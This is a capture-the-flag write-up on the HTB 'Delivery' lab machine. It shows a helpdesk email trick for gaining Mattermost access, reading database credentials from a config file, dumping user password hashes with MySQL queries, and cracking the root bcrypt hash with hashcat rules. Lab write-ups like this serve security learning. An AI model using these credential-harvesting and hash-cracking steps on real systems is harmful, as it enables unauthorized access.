This is a write-up on the Delivery machine challenge from HTB. For more information on challenges like these, check out my post on penetration testing. Special thanks to HTB user ippsec for creating the challenge.
Getting On The Server
A basic nmap shows the machine is running SSH and hosting a web server. Visit the website, which contains links to http://helpdesk.delivery.htb/ and http://delivery.htb:8065, and add the host names to /etc/hosts.
echo "10.10.10.222 helpdesk.delivery.htb delivery.htb" >> /etc/hosts
- Open a support ticket, keeping track of the ticket number. Also note the email address that is provided when the ticket is created "If you want to add more information to your ticket, just email [email protected]"
- Create an account on the mattermost server, using the email address provided when creating a support ticket (e.g. [email protected]).
- Check on the status of the support ticket. There will now be a message containing an validation link.
- Open the validation link and log into mattermost, then join the "Internal" team. Read all the messages, as they provide clues required later for privilege escalation.
- One of the messaged posted includes the username and password to the server. Use these credentials to SSH to the server and obtain user.txt.
Based on the clues provided, look for hashes that can be used to crack the root password. The file /opt/mattermost/config/config.json contains credentials for the mattermost database and is a good place to start.
mysql -u mmuser -p #enter password when prompted
show databases; #determine which database to connect to
use mattermost; #connect to database
show tables; #reconnaissance / find relevant information
select * from Users; #displays information about users, including password hashes
select Password from Users where Username = ‘root’; #narrow the search
The steps above can be used to obtain a password hash for root. To reverse the hash, the type of hash must be known. This can be obtained with the hashid command.
hashid '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' #bcrypt/Blowfish
Next, recall the clue on the mattermost server "PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases." The hashcat command can be used to create a list of password variations based on PleaseSubscribe! and which can be used as the wordlist for reversing the hash. Create a text file called mangleme with one line of text reading "PleaseSubscribe!" (without the quotes). Ensure the file contains no extraneous whitespace.
Run hashcat to create the wordlist, then run it again to reverse the hash.
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout mangleme > wordlist.txt
hashcat -m 3200 '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' wordlist.txt
The password for root is revealed and can be used with the su command to elevate to the root account and obtain root.txt.